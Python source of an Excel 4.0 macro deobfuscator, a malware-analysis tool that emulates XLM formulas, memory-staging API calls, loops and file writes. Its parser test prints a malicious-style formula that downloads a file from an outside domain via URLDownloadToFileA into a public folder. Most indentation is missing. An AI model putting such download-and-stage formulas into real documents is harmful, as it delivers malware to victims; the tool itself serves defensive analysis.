self.active_cell = self.get_cell(sheet, col, row)
status = EvalStatus.FullEvaluation
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = 0
return EvalResult(None, status, return_val, text)
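    # WHILE() records the loop's start cell and the truth of its condition on self._while_stack;
    # visit counting on the start cell caps runaway loops, and a FALSE (or over-visited) loop turns
    # on ignore_processing until the matching NEXT().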
def while_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.PartialEvaluation
text = ''
stack_record = {'start_point': current_cell, 'status': False}
condition_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
status = condition_eval_result.status
if condition_eval_result.status == EvalStatus.FullEvaluation:
if str(condition_eval_result.value).lower() == 'true':
stack_record['status'] = True
text = '{} -> [{}]'.format(XLMInterpreter.convert_ptree_to_str(parse_tree_root),
str(condition_eval_result.value))
if not text:
text = '{}'.format(XLMInterpreter.convert_ptree_to_str(parse_tree_root))
self._while_stack.append(stack_record)
current_cell.visit()
if current_cell.visited_too_many_times():
stack_record['status'] = False
if stack_record['status'] == False:
self.ignore_processing = True
self.next_count = 0
self._indent_level += 1
return EvalResult(None, status, 0, text)
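    # NEXT() pops the innermost WHILE record: if that loop's condition was TRUE the interpreter jumps
    # back to the loop's start cell, otherwise execution falls through to the following formula.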
def next_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.FullEvaluation
next_cell = None
if self.next_count == 0:
self.ignore_processing = False
next_cell = None
if len(self._while_stack) > 0:
top_record = self._while_stack.pop()
if top_record['status'] is True:
next_cell = top_record['start_point']
self._indent_level = self._indent_level - 1 if self._indent_level > 0 else 0
self._indent_current_line = True
else:
self.next_count -= 1
if next_cell is None:
status = EvalStatus.IGNORED
return EvalResult(next_cell, status, 0, 'NEXT')
def len_handler(self, arguments, current_cell, interactive, parse_tree_root):
arg_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if arg_eval_result.status == EvalStatus.FullEvaluation:
return_val = len(arg_eval_result.get_text(unwrap=True))
text = str(return_val)
status = EvalStatus.FullEvaluation
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = text
status = EvalStatus.PartialEvaluation
return EvalResult(None, status, return_val, text)
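    # REGISTER(dll, export, signature, alias, ...) maps an exported DLL function onto an XLM alias;
    # only the first four arguments are evaluated and the alias is stored in self._registered_functions.
    # Illustrative call: REGISTER("Kernel32","VirtualAlloc","JJJJ","VA",1,9) would register the alias
    # VA for Kernel32.VirtualAlloc.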
def register_handler(self, arguments, current_cell, interactive, parse_tree_root):
if len(arguments) >= 4:
arg_list = []
status = EvalStatus.FullEvaluation
for index, arg in enumerate(arguments):
if index > 3:
break
res_eval = self.evaluate_parse_tree(current_cell, arg, interactive)
arg_list.append(res_eval.get_text(unwrap=True))
function_name = "{}.{}".format(arg_list[0], arg_list[1])
# signature: https://support.office.com/en-us/article/using-the-call-and-register-functions-06fa83c1-2869-4a89-b665-7e63d188307f
function_signature = arg_list[2]
function_alias = arg_list[3]
# overrides previously registered function
self._registered_functions[function_alias] = {'name': function_name, 'signature': function_signature}
text = self.evaluate_argument_list(current_cell, 'REGISTER', arguments).get_text(unwrap=True)
else:
status = EvalStatus.Error
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = 0
return EvalResult(None, status, return_val, text)
def return_handler(self, arguments, current_cell, interactive, parse_tree_root):
arg1_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if self._function_call_stack:
return_cell = self._function_call_stack.pop()
return_cell.value = arg1_eval_res.value
arg1_eval_res.next_cell = self.get_formula_cell(return_cell.sheet,
return_cell.column,
str(int(return_cell.row) + 1))
if arg1_eval_res.text =='':
arg1_eval_res.text = 'RETURN()'
return arg1_eval_res
def fopen_handler(self, arguments, current_cell, interactive, parse_tree_root):
arg1_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if len(arguments)> 1:
arg2_eval_res = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
access = arg2_eval_res.value
else:
access = '1'
self._files[arg1_eval_res.get_text(unwrap=True)] = {'file_access': access,
'file_content': ''}
text = 'FOPEN({},{})'.format(arg1_eval_res.get_text(unwrap=False),
access)
return EvalResult(None, arg1_eval_res.status, arg1_eval_res.value, text)
def fwrite_handler(self, arguments, current_cell, interactive, parse_tree_root, end_line=''):
arg1_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
arg2_eval_res = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
file_name = arg1_eval_res.get_text(unwrap=True)
file_content = arg2_eval_res.get_text(unwrap=True)
status = EvalStatus.PartialEvaluation
if file_name in self._files:
status = EvalStatus.FullEvaluation
            self._files[file_name]['file_content'] += file_content + end_line
        text = 'FWRITE({},{})'.format(EvalResult.wrap_str_literal(file_name), EvalResult.wrap_str_literal(file_content))
return EvalResult(None, status, '0', text)
def fwriteln_handler(self, arguments, current_cell, interactive, parse_tree_root):
return self.fwrite_handler(arguments, current_cell, interactive, parse_tree_root, end_line='\r\n')
def offset_handler(self, arguments, current_cell, interactive, parse_tree_root):
value = 0
next = None
status = EvalStatus.PartialEvaluation
cell = self.get_cell_addr(current_cell, arguments[0])
row_index = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
col_index = self.evaluate_parse_tree(current_cell, arguments[2], interactive)
if isinstance(cell, tuple) and \
row_index.status == EvalStatus.FullEvaluation and \
col_index.status == EvalStatus.FullEvaluation:
row = str(int(cell[2]) + int(float(str(row_index.value))))
col = Cell.convert_to_column_name(Cell.convert_to_column_index(cell[1]) + int(float(str(col_index.value))))
ref_cell = (cell[0], col, row)
value = ref_cell
status = EvalStatus.FullEvaluation
next = self.get_formula_cell(self.xlm_wrapper.get_macrosheets()[cell[0]], col, row)
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return EvalResult(next, status, value, text)
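    # The Kernel32 handlers below emulate shellcode staging against a simple memory model:
    # self._memory holds {'base', 'size', 'data'} records that VirtualAlloc creates and
    # WriteProcessMemory / RtlCopyMemory fill through write_memory().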
def VirtualAlloc_handler(self, arguments, current_cell, interactive, parse_tree_root):
base_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
size_eval_res = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
if base_eval_res.status == EvalStatus.FullEvaluation and size_eval_res.status == EvalStatus.FullEvaluation:
base = int(base_eval_res.get_text(unwrap=True))
occupied_addresses = [rec['base'] + rec['size'] for rec in self._memory]
for memory_record in self._memory:
if memory_record['base'] <= base <= (memory_record['base'] + memory_record['size']):
                    base = max(occupied_addresses) + 4096
size = int(size_eval_res.get_text(unwrap=True))
self._memory.append({
'base': base,
'size': size,
'data': [0] * size
})
return_val = base
status = EvalStatus.FullEvaluation
else:
status = EvalStatus.PartialEvaluation
return_val = 0
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return EvalResult(None, status, return_val, text)
def WriteProcessMemory_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.PartialEvaluation
if len(arguments) > 4:
status = EvalStatus.FullEvaluation
args_eval_result = []
for arg in arguments:
arg_eval_res = self.evaluate_parse_tree(current_cell, arg, interactive)
if arg_eval_res.status != EvalStatus.FullEvaluation:
status = arg_eval_res.status
args_eval_result.append(arg_eval_res)
if status == EvalStatus.FullEvaluation:
base_address = int(args_eval_result[1].value)
mem_data = args_eval_result[2].value
mem_data = bytearray([ord(x) for x in mem_data])
size = int(args_eval_result[3].value)
if not self.write_memory(base_address, mem_data, size):
status = EvalStatus.Error
text = 'Kernel32.WriteProcessMemory({},{},"{}",{},{})'.format(
args_eval_result[0].get_text(),
base_address,
mem_data.hex(),
size,
args_eval_result[4].get_text())
return_val = 0
if status != EvalStatus.FullEvaluation:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = 0
return EvalResult(None, status, return_val, text)
def RtlCopyMemory_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.PartialEvaluation
if len(arguments) == 3:
destination_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
src_eval_res = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
size_res = self.evaluate_parse_tree(current_cell, arguments[2], interactive)
if destination_eval_res.status == EvalStatus.FullEvaluation and \
src_eval_res.status == EvalStatus.FullEvaluation:
status = EvalStatus.FullEvaluation
mem_data = src_eval_res.value
mem_data = bytearray([ord(x) for x in mem_data])
if not self.write_memory(int(destination_eval_res.value), mem_data, len(mem_data)):
status = EvalStatus.Error
text = 'Kernel32.RtlCopyMemory({},"{}",{})'.format(
destination_eval_res.get_text(),
mem_data.hex(),
size_res.get_text())
if status == EvalStatus.PartialEvaluation:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = 0
return EvalResult(None, status, return_val, text)
# endregion
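    # Copies mem_data into the emulated allocation containing base_address; returns False when the
    # write would run past the end of that allocation.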
def write_memory(self, base_address, mem_data, size):
result = True
for mem_rec in self._memory:
if mem_rec['base'] <= base_address <= mem_rec['base'] + mem_rec['size']:
if mem_rec['base'] <= base_address + size <= mem_rec['base'] + mem_rec['size']:
offset = base_address - mem_rec['base']
for i in range(0, size):
mem_rec['data'][offset + i] = mem_data[i]
else:
result = False
break
return result
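    # Recursive evaluator: dispatches on the parse-tree node type (token, function_call, cell, range,
    # operator expression, ...) and folds the children into a single EvalResult, downgrading the
    # status whenever a sub-expression could only be partially evaluated.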
def evaluate_parse_tree(self, current_cell, parse_tree_root, interactive=True):
current_cell.emulated = True
next_cell = None
status = EvalStatus.NotImplemented
text = None
return_val = None
if debug:
print("EVALUATE_PARSE_TREE!!")
print(current_cell)
print(parse_tree_root)
if type(parse_tree_root) is Token:
if debug:
print("THERE: 1")
if parse_tree_root.value in self.defined_names:
# this formula has a defined name that can be changed
# current formula must be removed from cache
self._remove_current_formula_from_cache = True
parse_tree_root.value = self.defined_names[parse_tree_root.value.lower()]
text = parse_tree_root.value
status = EvalStatus.FullEvaluation
return_val = text
result = EvalResult(next_cell, status, return_val, text)
elif type(parse_tree_root) is list:
if debug:
print("THERE: 2")
return_val = text = ''
status = EvalStatus.FullEvaluation
result = EvalResult(next_cell, status, return_val, text)
elif parse_tree_root.data == 'function_call':
if debug:
print("THERE: 3")
result = self.evaluate_function(current_cell, parse_tree_root, interactive)
elif parse_tree_root.data == 'cell':
if debug:
print("THERE: 4")
result = self.evaluate_cell(current_cell, interactive, parse_tree_root)
elif parse_tree_root.data == 'range':
if debug:
print("THERE: 5")
result = self.evaluate_range(current_cell, interactive, parse_tree_root)
elif parse_tree_root.data in self._expr_rule_names:
if debug:
print("THERE: 6")
text_left = None
concat_status = EvalStatus.FullEvaluation
for index, child in enumerate(parse_tree_root.children):
if type(child) is Token and child.type in ['ADDITIVEOP', 'MULTIOP', 'CMPOP', 'CONCATOP']:
op_str = str(child)
right_arg = parse_tree_root.children[index + 1]
right_arg_eval_res = self.evaluate_parse_tree(current_cell, right_arg, interactive)
text_right = right_arg_eval_res.get_text(unwrap=True)
if op_str == '&':
if left_arg_eval_res.status == EvalStatus.FullEvaluation and right_arg_eval_res.status != EvalStatus.FullEvaluation:
text_left = '{}&{}'.format(text_left, text_right)
left_arg_eval_res.status = EvalStatus.PartialEvaluation
concat_status = EvalStatus.PartialEvaluation
elif left_arg_eval_res.status != EvalStatus.FullEvaluation and right_arg_eval_res.status == EvalStatus.FullEvaluation:
text_left = '{}&{}'.format(text_left, text_right)
left_arg_eval_res.status = EvalStatus.FullEvaluation
concat_status = EvalStatus.PartialEvaluation
elif left_arg_eval_res.status != EvalStatus.FullEvaluation and right_arg_eval_res.status != EvalStatus.FullEvaluation:
text_left = '{}&{}'.format(text_left, text_right)
left_arg_eval_res.status = EvalStatus.PartialEvaluation
concat_status = EvalStatus.PartialEvaluation
else:
text_left = text_left + text_right
elif left_arg_eval_res.status == EvalStatus.FullEvaluation and right_arg_eval_res.status == EvalStatus.FullEvaluation:
status = EvalStatus.FullEvaluation
value_right = right_arg_eval_res.value
if self.is_float(value_left) and self.is_float(value_right):
if op_str in self._operators:
op_res = self._operators[op_str](float(value_left), float(value_right))
if type(op_res) == bool:
value_left = str(op_res)
elif op_res.is_integer():
value_left = str(int(op_res))
else:
op_res = round(op_res, 10)
value_left = str(op_res)
else:
value_left = 'Operator ' + op_str
left_arg_eval_res.status = EvalStatus.NotImplemented
else:
if op_str in self._operators:
value_left = EvalResult.unwrap_str_literal(str(value_left))
value_right = EvalResult.unwrap_str_literal(str(value_right))
op_res = self._operators[op_str](value_left, value_right)
value_left = op_res
else:
value_left = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
left_arg_eval_res.status = EvalStatus.PartialEvaluation
text_left = value_left
else:
left_arg_eval_res.status = EvalStatus.PartialEvaluation
text_left = '{}{}{}'.format(text_left, op_str, text_right)
return_val = text_left
else:
if text_left is None:
left_arg = parse_tree_root.children[index]
left_arg_eval_res = self.evaluate_parse_tree(current_cell, left_arg, interactive)
text_left = left_arg_eval_res.get_text(unwrap=True)
value_left = left_arg_eval_res.value
if concat_status == EvalStatus.PartialEvaluation and left_arg_eval_res.status == EvalStatus.FullEvaluation:
if debug:
print("THERE: 7")
left_arg_eval_res.status = concat_status
result = EvalResult(next_cell, left_arg_eval_res.status, return_val, EvalResult.wrap_str_literal(text_left))
elif parse_tree_root.data == 'final':
if debug:
print("THERE: 8")
arg = parse_tree_root.children[1]
result = self.evaluate_parse_tree(current_cell, arg, interactive)
else:
if debug:
print("THERE: 9")
status = EvalStatus.FullEvaluation
for child_node in parse_tree_root.children:
if child_node is not None:
child_eval_result = self.evaluate_parse_tree(current_cell, child_node, interactive)
if child_eval_result.status != EvalStatus.FullEvaluation:
status = child_eval_result.status
result = EvalResult(child_eval_result.next_cell, status, child_eval_result.value, child_eval_result.text)
result.output_level = child_eval_result.output_level
return result
def evaluate_cell(self, current_cell, interactive, parse_tree_root):
current_cell.emulated = True
sheet_name, col, row = self.get_cell_addr(current_cell, parse_tree_root)
return_val = ''
text = ''
status = EvalStatus.PartialEvaluation
if sheet_name is not None:
cell_addr = col + str(row)
sheet = self.xlm_wrapper.get_macrosheets()[sheet_name]
if cell_addr not in sheet.cells and (sheet_name, cell_addr) in self.cell_with_unsuccessfull_set:
if interactive:
self.invoke_interpreter = True
if self.first_unknown_cell is None:
self.first_unknown_cell = cell_addr
if cell_addr in sheet.cells:
cell = sheet.cells[cell_addr]
if cell.value is not None and cell.value != cell.formula:
text = EvalResult.wrap_str_literal(cell.value)
return_val = text
status = EvalStatus.FullEvaluation
elif cell.formula is not None:
parse_tree = self.xlm_parser.parse(cell.formula)
eval_result = self.evaluate_parse_tree(cell, parse_tree, False)
return_val = eval_result.value
text = eval_result.get_text()
status = eval_result.status
else:
text = "{}".format(cell_addr)
else:
if (sheet_name, cell_addr) in self.cell_with_unsuccessfull_set:
text = "{}".format(cell_addr)
else:
text = ''
status = EvalStatus.FullEvaluation
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return EvalResult(None, status, return_val, text)
def evaluate_range(self, current_cell, interactive, parse_tree_root):
current_cell.emulated = True
status = EvalStatus.PartialEvaluation
if len(parse_tree_root.children) >= 3:
start_address = self.get_cell_addr(current_cell, parse_tree_root.children[0])
end_address = self.get_cell_addr(current_cell, parse_tree_root.children[2])
selected = None
if len(parse_tree_root.children) == 5:
selected = self.get_cell_addr(current_cell, parse_tree_root.children[4])
self.selected_range = (start_address, end_address, selected)
status = EvalStatus.FullEvaluation
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
        return_val = 0
        return EvalResult(None, status, return_val, text)
def interactive_shell(self, current_cell, message):
print('\nProcess Interruption:')
print('CELL:{:10}{}'.format(current_cell.get_local_address(), current_cell.formula))
print(message)
print('Enter XLM macro:')
        print('Tip: CLOSE() or HALT() to exit')
while True:
line = input()
line = '=' + line.strip()
if line:
try:
parse_tree = self.xlm_parser.parse(line)
ret_result = self.evaluate_parse_tree(current_cell, parse_tree, interactive=False)
print(ret_result.value)
if ret_result.status == EvalStatus.End:
break
except ParseError as exp:
print("Invalid XLM macro")
except KeyboardInterrupt:
sys.exit()
else:
break
def has_loop(self, path, length=10):
if len(path) < length * 2:
return False
else:
result = False
start_index = len(path) - length
for j in range(0, start_index - length):
matched = True
k = j
while start_index + k - j < len(path):
if path[k] != path[start_index + k - j]:
matched = False
break
k += 1
if matched:
result = True
break
return result
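    # Matches double-quoted XLM string literals, where an embedded quote is escaped by doubling ("").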
regex_string = r'\"([^\"]|\"\")*\"'
detect_string = re.compile(regex_string, flags=re.MULTILINE)
def extract_strings(self, string):
result = []
matches = XLMInterpreter.detect_string.finditer(string)
for matchNum, match in enumerate(matches, start=1):
result.append(match.string[match.start(0):match.end(0)])
return result
def do_brute_force_emulation(self, silent_mode=False):
# Emulate each previously unemulated cell. Just do this on the same sheet as
# the original cells used to start emulation.
for start_point in self.auto_open_labels:
start_point = start_point[1]
sheet_name, _, _ = Cell.parse_cell_addr(start_point)
sheets = self.xlm_wrapper.get_macrosheets()
#print("START BRUTE!!")
#print(sheet_name)
#print(start_point)
if sheet_name in sheets:
sheet = sheets[sheet_name]
#print("\nBRUTE CELLS!!")
for cell_addr in sheet.cells.keys():
# Do we need to emulate this cell?
curr_cell = sheet.cells[cell_addr]
if ((curr_cell.formula is None) or (curr_cell.emulated)):
# No, skip it.
continue
# Yes, we need to emulate this cell.
# Parse and emulate the cell formula.
#print(sheet.cells[cell_addr].debug())
parse_tree = None
try:
parse_tree = self.xlm_parser.parse(curr_cell.formula)
except ParseError:
continue
evaluation_result = self.evaluate_parse_tree(curr_cell, parse_tree, interactive=False)
print(evaluation_result)
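    # Main emulation loop: starts from the auto_open label(s), walks cells formula by formula, replays
    # branches pushed by IF(), caches parsed formulas, aborts paths that repeat the same cell sequence
    # (has_loop), and yields (cell, status, formula_text, indent) tuples to the caller.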
def deobfuscate_macro(self, interactive, start_point="", silent_mode=False, brute_force=False):
result = []
self.auto_open_labels = self.xlm_wrapper.get_defined_name('auto_open', full_match=False)
if len(self.auto_open_labels) == 0:
if len(start_point) > 0:
self.auto_open_labels = [('auto_open', start_point)]
elif interactive:
print('There is no entry point, please specify a cell address to start')
print('Example: Sheet1!A1')
self.auto_open_labels = [('auto_open', input().strip())]
if self.auto_open_labels is not None and len(self.auto_open_labels) > 0:
macros = self.xlm_wrapper.get_macrosheets()
for auto_open_label in self.auto_open_labels:
try:
sheet_name, col, row = Cell.parse_cell_addr(auto_open_label[1])
if sheet_name in macros:
current_cell = self.get_formula_cell(macros[sheet_name], col, row)
self._branch_stack = [(current_cell, current_cell.formula, macros[sheet_name].cells, 0, '')]
observed_cells = []
while len(self._branch_stack) > 0:
current_cell, formula, saved_cells, indent_level, desc = self._branch_stack.pop()
macros[current_cell.sheet.name].cells = saved_cells
self._indent_level = indent_level
stack_record = True
while current_cell is not None:
if type(formula) is str:
replace_op = getattr(self.xlm_wrapper, "replace_nonprintable_chars", None)
if callable(replace_op):
formula = replace_op(formula, '_')
if formula not in self._formula_cache:
parse_tree = self.xlm_parser.parse(formula)
self._formula_cache[formula] = parse_tree
else:
parse_tree = self._formula_cache[formula]
else:
parse_tree = formula
if stack_record:
previous_indent = self._indent_level - 1 if self._indent_level > 0 else 0
else:
previous_indent = self._indent_level
evaluation_result = self.evaluate_parse_tree(current_cell, parse_tree, interactive)
if self._remove_current_formula_from_cache:
self._remove_current_formula_from_cache = False
if formula in self._formula_cache:
del(self._formula_cache[formula])
if len(self._while_stack) == 0 and evaluation_result.text != 'NEXT':
observed_cells.append(current_cell.get_local_address())
if self.has_loop(observed_cells):
break
if self.invoke_interpreter and interactive:
self.interactive_shell(current_cell,
'Partial Eval: {}\r\n{} is not populated, what should be its value?'.format(
evaluation_result.text,
self.first_unknown_cell))
self.invoke_interpreter = False
self.first_unknown_cell = None
continue
if evaluation_result.value is not None:
current_cell.value = str(evaluation_result.value)
if evaluation_result.next_cell is None and \
(evaluation_result.status == EvalStatus.FullEvaluation or
evaluation_result.status == EvalStatus.PartialEvaluation or
evaluation_result.status == EvalStatus.NotImplemented or
evaluation_result.status == EvalStatus.IGNORED):
evaluation_result.next_cell = self.get_formula_cell(current_cell.sheet,
current_cell.column,
str(int(current_cell.row) + 1))
if stack_record:
evaluation_result.text = (
desc + ' ' + evaluation_result.get_text(unwrap=False)).strip()
if self._indent_current_line:
previous_indent = self._indent_level
self._indent_current_line = False
if evaluation_result.status != EvalStatus.IGNORED:
if self.output_level >= 3 and evaluation_result.output_level == 2:
strings = self.extract_strings(evaluation_result.get_text(unwrap=True))
if strings:
yield (
current_cell, evaluation_result.status,
'\n'.join(strings),
previous_indent)
elif evaluation_result.output_level >= self.output_level:
yield (
current_cell, evaluation_result.status,
evaluation_result.get_text(unwrap=False),
previous_indent)
if debug:
print("END OF LOOP!!")
print("CURRENT CELL:")
print(current_cell.debug())
if evaluation_result.next_cell is not None:
current_cell = evaluation_result.next_cell
if debug:
print("NEXT CELL:")
print(current_cell.debug())
else:
if debug:
print("NEXT CELL:")
print("NO NEXT CELL")
break
formula = current_cell.formula
stack_record = False
# We are done with the proper emulation loop. Now perform a
# "brute force" emulation of any unemulated cells if needed.
if brute_force:
self.do_brute_force_emulation(silent_mode=silent_mode)
except Exception as exp:
exc_type, exc_obj, traceback = sys.exc_info()
frame = traceback.tb_frame
lineno = traceback.tb_lineno
filename = frame.f_code.co_filename
linecache.checkcache(filename)
line = linecache.getline(filename, lineno, frame.f_globals)
if debug:
raise exp
uprint('Error [{}:{} {}]: {}'.format(os.path.basename(filename),
lineno,
line.strip(),
exc_obj),
silent_mode=silent_mode)
def test_parser():
grammar_file_path = os.path.join(os.path.dirname(__file__), 'xlm-macro-en.lark')
macro_grammar = open(grammar_file_path, 'r', encoding='utf_8').read()
xlm_parser = Lark(macro_grammar, parser='lalr')
print("\n=HALT()")
print(xlm_parser.parse("=HALT()"))
print("\n=171*GET.CELL(19,A81)")
print(xlm_parser.parse("=171*GET.CELL(19,A81)"))
print("\n=FORMULA($ET$1796&$BE$1701&$DB$1527&$BU$714&$CT$1605)")
print(xlm_parser.parse("=FORMULA($ET$1796&$BE$1701&$DB$1527&$BU$714&$CT$1605)"))
print("\n=RUN($DC$240)")
print(xlm_parser.parse("=RUN($DC$240)"))
print("\n=CHAR($IE$1109-308)")
print(xlm_parser.parse("=CHAR($IE$1109-308)"))
print("\n=CALL($C$649,$FN$698,$AM$821,0,$BB$54,$BK$36,0,0)")
print(xlm_parser.parse("=CALL($C$649,$FN$698,$AM$821,0,$BB$54,$BK$36,0,0)"))
print("\n=HALT()")
print(xlm_parser.parse("=HALT()"))
print('\n=WAIT(NOW()+"00:00:03")')
print(xlm_parser.parse('=WAIT(NOW()+"00:00:03")'))
print("\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))")
print(xlm_parser.parse("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))"))
    print('\n' + r'=OPEN(GET.WORKSPACE(48)&"\WZTEMPLT.XLA")')
print(xlm_parser.parse(r'=OPEN(GET.WORKSPACE(48)&"\WZTEMPLT.XLA")'))
print(
"""\n=IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\\Users\\Public\\bwep5ef.html",0,0),)""")
print(xlm_parser.parse(
"""=IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\\Users\\Public\\bwep5ef.html",0,0),)"""))
_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
if _parent_dir not in sys.path:
sys.path.insert(0, _parent_dir)
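# Sniff the container format from the first two bytes: D0 CF marks an OLE2 compound file (legacy .xls),
# 50 4B ("PK") marks a ZIP-based OOXML workbook, further split into .xlsb vs .xlsm by the presence of
# workbook.bin inside the archive.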
def get_file_type(path):
file_type = None
with open(path, 'rb') as input_file:
start_marker = input_file.read(2)
if start_marker == b'\xD0\xCF':
file_type = 'xls'
elif start_marker == b'\x50\x4B':
file_type = 'xlsm/b'
if file_type == 'xlsm/b':
raw_bytes = open(path, 'rb').read()
if bytes('workbook.bin', 'ascii') in raw_bytes:
file_type = 'xlsb'
else:
file_type = 'xlsm'
return file_type
def show_cells(excel_doc):
macrosheets = excel_doc.get_macrosheets()
auto_open_labels = excel_doc.get_defined_name('auto_open', full_match=False)
for macrosheet_name in macrosheets:
# yield 'SHEET: {}, {}'.format(macrosheets[macrosheet_name].name,
# macrosheets[macrosheet_name].type)
yield macrosheets[macrosheet_name].name, macrosheets[macrosheet_name].type
for formula_loc, info in macrosheets[macrosheet_name].cells.items():
if info.formula is not None:
yield info, 'EXTRACTED', info.formula, '', info.value
# yield 'CELL:{:10}, {:20}, {}'.format(formula_loc, info.formula, info.value)
for formula_loc, info in macrosheets[macrosheet_name].cells.items():
if info.formula is None:
# yield 'CELL:{:10}, {:20}, {}'.format(formula_loc, str(info.formula), info.value)
yield info, 'EXTRACTED', str(info.formula), '', info.value,
def uprint(*objects, sep=' ', end='\n', file=sys.stdout, silent_mode=False):
if silent_mode:
return
enc = file.encoding
if enc == 'UTF-8':
print(*objects, sep=sep, end=end, file=file)
else:
f = lambda obj: str(obj).encode(enc, errors='backslashreplace').decode(enc)
print(*map(f, objects), sep=sep, end=end, file=file)
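# Renders one interpretation step using the --output-formula-format template; the placeholders
# [[CELL-ADDR]], [[STATUS]] and [[INT-FORMULA]] are replaced with the cell address, evaluation status
# and (optionally indented) formula. Illustrative output with the default template:
#   CELL:A1        , FullEvaluation      , =RUN($DC$240)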
def get_formula_output(interpretation_result, format_str, with_index=True):
cell_addr = interpretation_result[0].get_local_address()
status = interpretation_result[1]
formula = interpretation_result[2]
indent = ''.join(['\t'] * interpretation_result[3])
result = ''
if format_str is not None and type(format_str) is str:
result = format_str
result = result.replace('[[CELL-ADDR]]', '{:10}'.format(cell_addr))
result = result.replace('[[STATUS]]', '{:20}'.format(status.name))
if with_index:
formula = indent + formula
result = result.replace('[[INT-FORMULA]]', formula)
return result
def convert_to_json_str(file, defined_names, records, memory=None, files=None):
file_content = open(file, 'rb').read()
md5 = hashlib.md5(file_content).hexdigest()
sha256 = hashlib.sha256(file_content).hexdigest()
if defined_names:
for key, val in defined_names.items():
if isinstance(val, Tree):
defined_names[key]= XLMInterpreter.convert_ptree_to_str(val)
res = {'file_path': file, 'md5_hash': md5, 'sha256_hash': sha256, 'analysis_timestamp': int(time.time()),
'format_version': 1, 'analyzed_by': 'XLMMacroDeobfuscator',
'link': 'https://github.com/DissectMalware/XLMMacroDeobfuscator', 'defined_names': defined_names,
'records': [], 'memory_records': [], 'files':[]}
res["iocs"] = list(intermediate_iocs)
for index, i in enumerate(records):
if len(i) == 4:
res['records'].append({'index': index,
'sheet': i[0].sheet.name,
'cell_add': i[0].get_local_address(),
'status': str(i[1]),
'formula': i[2]})
elif len(i) == 5:
res['records'].append({'index': index,
'sheet': i[0].sheet.name,
'cell_add': i[0].get_local_address(),
'status': str(i[1]),
'formula': i[2],
'value': str(i[4])})
if memory:
for mem_rec in memory:
res['memory_records'].append({
'base': mem_rec['base'],
'size': mem_rec['size'],
                'data_base64': base64.b64encode(bytearray(mem_rec['data'])).decode()
})
if files:
for file in files:
if len(files[file]['file_content'])>0:
bytes_str = files[file]['file_content'].encode('utf_8')
base64_str = base64.b64encode(bytes_str).decode()
res['files'].append({
'path': file,
'access': files[file]['file_access'],
'content_base64': base64_str
})
return res
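# Attempts msoffcrypto decryption into a temporary file. process_file() calls this with the supplied
# --password, defaulting to 'VelvetSweatshop', the implicit password Excel applies to workbooks that
# were encrypted without an explicit one.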
def try_decrypt(file, password=''):
is_encrypted = False
tmp_file_path = None
try:
msoffcrypto_obj = msoffcrypto.OfficeFile(open(file, "rb"))
if msoffcrypto_obj.is_encrypted():
is_encrypted = True
temp_file_args = {'prefix': 'decrypt-', 'suffix': os.path.splitext(file)[1], 'text': False}
tmp_file_handle = None
try:
msoffcrypto_obj.load_key(password=password)
tmp_file_handle, tmp_file_path = mkstemp(**temp_file_args)
with os.fdopen(tmp_file_handle, 'wb') as tmp_file:
msoffcrypto_obj.decrypt(tmp_file)
except:
if tmp_file_handle:
tmp_file_handle.close()
os.remove(tmp_file_path)
tmp_file_path = None
except Exception as exp:
if debug:
raise exp
uprint(str(exp), silent_mode=SILENT)
return tmp_file_path, is_encrypted
def get_logo():
return """
_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
|/ \|(_______/|/ \|
______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
| ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
| | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
| | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
| | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
| (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
(______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
"""
def process_file(**kwargs):
""" Example of kwargs when using as library
{
'file': '/tmp/8a6e4c10c30b773147d0d7c8307d88f1cf242cb01a9747bfec0319befdc1fcaf',
'noninteractive': True,
'extract_only': False,
'with_ms_excel': False,
'start_with_shell': False,
